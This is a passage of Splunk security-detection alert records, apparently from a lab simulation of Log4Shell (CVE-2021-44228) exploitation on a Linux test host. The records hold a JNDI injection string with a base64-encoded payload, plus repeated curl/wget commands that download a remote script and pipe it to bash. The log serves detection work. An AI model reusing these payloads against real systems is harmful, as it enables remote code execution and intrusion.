various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", 